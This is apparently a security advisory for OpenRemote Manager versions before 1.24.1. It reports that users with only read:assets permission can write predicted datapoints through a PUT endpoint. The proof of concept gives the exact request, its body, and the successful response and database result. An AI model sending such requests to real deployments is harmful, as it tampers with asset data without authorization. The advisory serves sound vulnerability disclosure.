GHSA-xj53-j257-hxvgMediumCVSS 4.3

OpenRemote read-only asset users can write predicted datapoints

Published
July 6, 2026
Last Modified
July 6, 2026

🔗 CVE IDs covered (1)

📋 Description

Summary

The predicted datapoint write endpoint allows users with only read:assets privileges to write predicted datapoints.

The endpoint:

PUT /api/{realm}/asset/predicted/{assetId}/{attributeName}

accepts write requests from users lacking write:assets.

The implementation appears to check READ_ASSETS while performing a write operation through:

assetPredictedDatapointService.updateValues(...)

PoC

A user was created with only:

read:assets

and without write:assets.

The following request succeeded:

PUT /api/master/asset/predicted/4Fr8Pcp7iDjrEmoSUFolvT/temperature

Request body:

[{"x":1779199999001,"y":1337}]

Response:

HTTP/2 204

Database verification confirmed the datapoint was written successfully:

entity_id: 4Fr8Pcp7iDjrEmoSUFolvT
attribute_name: temperature
value: 1337

Impact

Users with read-only asset permissions can modify predicted datapoints for assets.

🎯 Affected products1

  • maven/io.openremote:openremote-manager:< 1.24.1

🔗 References (3)